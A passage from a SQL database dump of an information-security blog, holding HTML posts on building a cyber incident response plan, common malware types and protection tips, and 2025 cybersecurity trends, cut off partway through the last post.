[&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Develop Detailed Procedures</strong></b>:</li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Outline actionable steps for identification, containment, recovery, and communication.</li>\r\n</ul>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"4\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Set Metrics for Success</strong></b>:</li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Define KPIs (e.g., time to detect, contain, and recover) to evaluate your CIRP\'s effectiveness.</li>\r\n</ul>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"5\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Conduct Training and Simulations</strong></b>:</li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Ensure all stakeholders understand their responsibilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Regularly run simulations to test your CIRP.</li>\r\n</ul>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"6\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\"><b><strong class=\"font-bold\">Review and Update Regularly</strong></b>:</li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Update your CIRP annually or after every significant incident.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">8. Conclusion and Next Steps</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Building a Cyber Incident Response Plan is crucial for safeguarding your business in this evolving digital threat landscape. Whether you’re a small business owner, IT professional, or cybersecurity enthusiast, a robust CIRP is your shield against potential crises.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Take the next step towards enhancing your cybersecurity measures today. Start by assessing your current security posture and drafting a basic CIRP to handle future incidents. Remember—the best time to prepare for a cyber attack was yesterday. The second best time is today.</p>', '', NULL, NULL, 1, 'draft', '2025-01-19 15:08:54', '2026-01-12 21:41:44', 'Information Security', 'How to Create a Cyber Incident Response Plan', '', NULL),
(70, 'A Comprehensive Guide to Computer Viruses and How to Stay Safe', 'a-comprehensive-guide-to-computer-viruses-and-how-to-stay-safe', '[fusion_builder_container type=\"flex\" hundred_percent=\"no\" equal_height_columns=\"no\" hide_on_mobile=\"small-visibility,medium-visibility,large-visibility\" background_position=\"center center\" background_repeat=\"no-repeat\" fade=\"no\" background_parallax=\"none\" parallax_speed=\"0.3\" video_aspect_ratio=\"16:9\" video_loop=\"yes\" video_mute=\"yes\" border_style=\"solid\"][fusion_builder_row][fusion_builder_column type=\"1_1\" type=\"1_1\" background_position=\"left top\" border_style=\"solid\" border_position=\"all\" spacing=\"yes\" background_repeat=\"no-repeat\" margin_top=\"0px\" margin_bottom=\"0px\" animation_speed=\"0.3\" animation_direction=\"left\" hide_on_mobile=\"small-visibility,medium-visibility,large-visibility\" center_content=\"no\" last=\"no\" hover_type=\"none\" min_height=\"\" link=\"\"][fusion_text]<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Computer viruses</strong></b> are an ever-present threat in our digital lives. Just like biological viruses, they spread fast, cause harm, and often remain unnoticed until it\'s too late. With the rise of technology in daily life, understanding viruses, malware types, and protection strategies is critical. This guide will explain <b><strong class=\"font-bold\">what malware is</strong></b>, break down various types of threats, and share practical tips for <b><strong class=\"font-bold\">protecting your devices and data</strong></b>.</p>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What is Malware?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Malware is short for “malicious software,” and it’s designed to harm, exploit, or disrupt your system. From stealing data to damaging files or taking control of your computer, malware can wreak havoc in various ways.</p>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How Malware Works</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Once your device is infected with a virus, it spreads rapidly by exploiting system vulnerabilities. Like a biological virus, it replicates itself and can damage other parts of your computer.</p>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Real-Life Example</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The infamous “I Love You” virus spread via email with a fake love letter attachment. When opened, the virus executed a harmful script that damaged files and forwarded itself to everyone in the user’s contact list, causing widespread chaos.</p>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Types of Computer Viruses and Malware</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Understanding the different types of malware is key to staying safe. Here are <b><strong class=\"font-bold\">eight common types</strong></b> of computer threats:</p>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Trojan Horses</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">These viruses disguise themselves as legitimate software, tricking users into installing them. Once active, they run harmful operations, often stealing sensitive data. A notable example is the Zeus Trojan, which targeted banking information globally.</p>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Backdoors</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A backdoor allows secret access to a system. Sometimes built intentionally by developers, these vulnerabilities can be exploited by hackers, leading to severe security breaches.</p>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Worms</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Unlike other malware, worms don’t need user interaction to spread. They infiltrate systems by exploiting network vulnerabilities. MyDoom, a famous worm, created a botnet used for cyberattacks like distributed denial-of-service (DDoS).</p>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Spyware</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This type of malware operates silently, collecting your private information—like passwords or financial details—without your knowledge. For example, keyloggers record and transmit everything you type.</p>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. Ransomware</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Ransomware encrypts your files and demands payment to unlock them. Both individuals and companies are common targets. Paying the ransom doesn’t guarantee data recovery, making prevention critical.</p>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. RAM Scrapers</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">RAM scrapers extract sensitive information from your computer’s memory. For instance, malware like BlackPOS targeted retail point-of-sale systems, stealing customers\' credit card data.</p>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">7. Adware and Browser Hijackers</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Adware forces intrusive ads on you, while browser hijackers modify your settings—like changing your homepage or installing unwanted extensions—often redirecting you to malicious websites.</p>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">8. File-Wiping Viruses</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">These are designed purely to destroy. Unlike ransomware, which seeks financial gain, file-wiping viruses erase data and damage systems beyond repair.</p>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Detect and Remove Computer Viruses</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If you suspect your computer has been infected, follow these steps to identify and eliminate threats:</p>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n<li>ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"&gt;<b><strong class=\"font-bold\">Run a Virus Scan</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Use trusted antivirus or antimalware software to detect malicious files. Ensure your software is up to date.</p>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n<li>ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"&gt;<b><strong class=\"font-bold\">Monitor for Unusual Behavior</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Slower system performance, unexpected pop-ups, or strange restarts could signal an infection.</p>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n<li>ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"&gt;<b><strong class=\"font-bold\">Disconnect from Networks</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cut off internet access immediately to prevent the virus from spreading or stealing data.</p>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n<li>ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"&gt;<b><strong class=\"font-bold\">Remove the Virus</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Follow the instructions provided by your antivirus software to quarantine and permanently delete the malware.</p>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Best Practices for Preventing Future Attacks</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Prevention is always better than cure, especially in the case of cyber threats. Here are <b><strong class=\"font-bold\">five critical steps</strong></b> to keep your systems secure:</p>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Avoid Suspicious Links</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Don’t click on unknown links or email attachments from untrusted senders.</p>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Keep Software Updated</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Regularly update operating systems, browsers, and software to patch vulnerabilities that cybercriminals exploit.</p>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Use Firewalls</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Enable hardware and software firewalls to block unauthorized access to your network.</p>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Stay Wary of Pop-Ups</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Avoid interacting with suspicious pop-ups and ads—they’re often gateways to malware sites.</p>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. Always stay up-to date</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Learn about common cyberattack tactics, such as phishing, to identify threats before they impact you.<br><br></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Cybersecurity</strong></b> is a shared responsibility. By understanding <b><strong class=\"font-bold\">different types of malware</strong></b>, the way they function, and how to protect yourself from them, you’re taking proactive steps to safeguard your devices and data. Whether you\'re dealing with <b><strong class=\"font-bold\">ransomware</strong></b>, <b><strong class=\"font-bold\">spyware</strong></b>, or <b><strong class=\"font-bold\">worms</strong></b>, using modern antivirus solutions can help.</p>[/fusion_text][/fusion_builder_column][/fusion_builder_row][/fusion_builder_container]', '', NULL, NULL, 1, 'draft', '2025-01-18 19:26:30', '2026-01-12 21:41:44', 'Information Security', 'A Comprehensive Guide to Computer Viruses and How to Stay Safe', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(71, 'The Future of Cybersecurity: Trends to Watch in 2025 and Beyond', 'the-future-of-cybersecurity-trends-to-watch-in-2025-and-beyond', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The digital landscape continues to evolve at breakneck speed, and with it come new challenges and opportunities in cybersecurity. For IT professionals and technology enthusiasts, staying ahead of the curve isn\'t just a matter of professional development—it\'s essential for protecting businesses and individuals from increasingly sophisticated cyber threats.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This blog dives into the <b><strong class=\"font-bold\">future of cybersecurity</strong></b> by highlighting key <b><strong class=\"font-bold\">cybersecurity trends</strong></b> that are shaping how we safeguard systems, data, and infrastructure.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Staying Ahead Matters</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">2023 showcased some of the largest cyber attacks targeting supply chains, cloud systems, and SMBs (small to medium-sized businesses) in unprecedented ways. For those in the IT security field, preparation is no longer optional—it\'s a daily necessity.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By keeping a pulse on these cybersecurity trends, IT professionals can protect sensitive information, minimize vulnerabilities, and adopt proactive measures to counteract evolving threats.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Top Cybersecurity Trends to Watch</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. <b><strong class=\"font-bold\">Rise of AI-Powered Cyber Threats</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Artificial intelligence (AI) isn\'t just being used for good. Cybercriminals are leveraging AI to create malware that evolves and adapts, making traditional security measures ineffective.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Trend alert</strong></b>: These \"smart\" cyber attacks can analyze patterns in IT systems and disguise themselves better than older malware types.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">What IT professionals can do</strong></b>: Invest in AI-driven cybersecurity tools capable of identifying and neutralizing threats in real time.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. <b><strong class=\"font-bold\">Zero Trust Security Architecture</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The concept of \"trust but verify\" is shifting to <b><strong class=\"font-bold\">verify everything, trust nothing</strong></b>. This <b><strong class=\"font-bold\">zero trust</strong></b> model assumes every user, device, or system attempting to connect to a network could pose a risk.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Why this matters</strong></b>: Many of the largest breaches in 2023 involved compromised credentials or insider threats. Zero trust architectures offer an additional layer of scrutiny.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Actionable next step</strong></b>: Implement strong authentications like multi-factor authentication (MFA) to secure access at all levels, including privileged accounts.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. <b><strong class=\"font-bold\">Cloud Security Takes Center Stage</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cloud adoption is increasing, but so are targeted cloud attacks. Misconfigured cloud settings, lack of encryption, and shared responsibility gaps with providers have put businesses at greater risk.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Trend spotlight</strong></b>: Gartner predicts that by 2025, 99% of cloud failures will be the customer\'s fault due to mismanagement.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">What to do</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Regularly audit cloud configurations.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Train employees on shared responsibility models of cloud security.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">Leverage encryption tools for sensitive data stored in the cloud.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. <b><strong class=\"font-bold\">Emergence of Quantum Computing Risks</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Quantum computing, while promising in revolutionizing computing power, poses a significant challenge for cryptography. <b><strong class=\"font-bold\">Quantum attacks</strong></b> have the potential to render traditional encryption methods obsolete.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Impact on cybersecurity</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Widely used public-key encryptions could be vulnerable.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Companies will need <b><strong class=\"font-bold\">post-quantum encryption (PQE)</strong></b> strategies before quantum computers become mainstream.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Call to action for IT professionals</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">Stay updated on advancements in cryptography.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\">Begin exploring PQC (post-quantum cryptography) technologies.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. <b><strong class=\"font-bold\">Ransomware-as-a-Service (RaaS)</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Ransomware attacks are becoming easier to execute thanks to <b><strong class=\"font-bold\">Ransomware-as-a-Service</strong></b> platforms sold on the dark web. These pre-built kits lower entry barriers for wannabe hackers, making businesses of all sizes potential targets.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Notable statistic</strong></b>: According to cybersecurity reports, ransomware groups earned over $1 billion in the past year alone.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">How to mitigate the risk</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Regularly backup critical systems and data.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Train employees to recognize phishing schemes often used to deploy ransomware.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">Update and patch exposed vulnerabilities in operating systems and software.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. <b><strong class=\"font-bold\">Role of IoT (Internet of Things) Security</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">From smart thermostats to medical devices, more <b><strong class=\"font-bold\">IoT devices</strong></b> connect to the internet than ever before. However, many of these devices lack robust security measures, leaving entry points in enterprise networks vulnerable.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Future projection</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">IoT devices will surpass 75 billion by 2025.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 